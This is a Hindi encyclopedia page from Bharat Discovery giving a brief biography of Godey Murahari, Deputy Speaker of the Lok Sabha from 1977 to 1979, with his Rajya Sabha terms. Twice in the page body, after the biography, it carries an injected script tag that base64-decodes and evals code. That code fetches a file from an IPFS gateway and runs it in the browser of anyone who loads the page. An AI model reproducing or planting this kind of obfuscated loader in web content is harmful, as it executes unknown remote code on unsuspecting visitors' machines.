गोदे मुरहारी

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
गोदे गंगाराजू मुरहारी

गोदे गंगाराजू मुरहारी (अंग्रेज़ी: Godey Gangaraju Murahari, जन्म- 20 मई, 1926; मृत्यु- 6 अगस्त, 1982) भारतीय राजनीतिज्ञ थे। वह छठवीं लोकसभा में 1 अप्रॅल, 1977 से 22 अगस्त, 1979 तक लोकसभा उपाध्यक्ष पद पर रहे।

  • गोदे मुरहारी तीन सत्रों तक राज्य सभा के सदस्य रहे-
  1. 3 अप्रैल, 1962 से 2 अप्रैल, 1968 तक
  2. 3 अप्रैल, 1968 से 2 अप्रैल, 1974 तक
  3. 3 अप्रैल, 1974 से 20 मार्च, 1977 तक
पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

बाहरी कड़ियाँ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>